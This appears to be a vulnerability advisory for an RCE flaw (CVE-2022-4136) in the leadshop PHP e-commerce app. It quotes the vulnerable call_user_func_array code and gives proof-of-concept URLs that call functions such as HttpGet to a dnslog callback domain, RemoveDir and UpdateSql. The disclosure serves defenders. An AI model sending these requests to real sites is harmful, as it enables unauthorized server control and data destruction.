Lucene search
OuroborosscrFE418AE1-7C80-4D91-8A5A-923D60BA78C3HistoryNov 07, 2022 - 9:25 a.m.
There is an RCE vulnerability
2022-11-0709:25:52
ouroborosscr
www.huntr.dev
154
rce vulnerability
qmpaas/leadshop
leadshop.php
call_user_func_array
get parameters
httpget
tomkdir
updatesql
downloadfile
removedir
0.002 Low
EPSS
Percentile
57.2%
Description
There is an RCE vulnerability in qmpaas/leadshop (https://github.com/qmpaas/leadshop) (v1.4.15). An attacker can access the file leadshop.php and call any existing function through GET to control the target host.
The vulnerability is in the leadshop/web/leadshop.php[27-61] file
public function run()
{
//读取参数数据
$include = isset($_GET['include']) ? $_GET['include'] : "";
$data = isset($_GET['data']) ? $_GET['data'] : "";
$meta = isset($_GET['meta']) ? $_GET['meta'] : "";
//执行数据方法
if ($include) {
return call_user_func_array([$this, $include], [$meta, $data]);
} else {
//用于判断是否非法操作
$token = isset($_GET['token']) ? $_GET['token'] : "";
$html = get_oss_url('index.html');
//判断锁文件是否存在,存在则是要执行更新
if (@file_exists(dirname(__DIR__) . "/install.lock")) {
if (@file_get_contents(dirname(__DIR__) . "/install.lock") === $token) {
if (!isset($_SESSION['self_update'])) {
//执行更新自身
$this->SilentSelfUpdate();
}
//执行更新操作
$version = get_version();
$body = $this->DownloadFile($html);
echo str_replace('{$version}', $version, $body);
} else {
die("检测到非法Token,请登录后台进入更新界面");
}
} else {
$version = get_version();
$body = $this->DownloadFile($html);
echo str_replace('{$version}', $version, $body);
}
}
}
The call_user_func_array function is used directly, and $include, $data, and $meta receive get parameters, which allows us to run all functions in this file (parameters less than or equal to 2), such as:
HttpGet (http access: poc: https://demo.leadshop.vip/leadshop.php?include=HttpGet&meta=6nup69.dnslog.cn),
ToMkdir (create folder: poc: https://demo.leadshop.vip/leadshop.php?include=ToMkdir&meta=1 ),
UpdateSql (perform database update: poc: https://demo.leadshop.vip/leadshop.php?include=UpdateSql),
DownloadFile (download file: poc: https://demo.leadshop.vip/leadshop.php?include=DownloadFile&meta=www.baidu.com/img/flexible/logo/pc/peak-result.png)
RemoveDir (remove directory: poc: https://demo.leadshop.vip/leadshop.php?include=RemoveDir&meta=[path])
Proof of Concept:
Poc:
https://demo.leadshop.vip/leadshop.php?include=HttpGet&meta=6nup69.dnslog.cn
DNSLOG picture:
Related
cve
cve
CVE-2022-4136
2022-11-24 08:15:09
osv
osv
CVE-2022-4136
2022-11-24 08:15:09
cvelist
cvelist
CVE-2022-4136 Exposed Dangerous Method or Function in qmpaas/leadshop
2022-11-24 00:00:00
prion
prion
Security feature bypass
2022-11-24 08:15:00
nvd
nvd
CVE-2022-4136
2022-11-24 08:15:09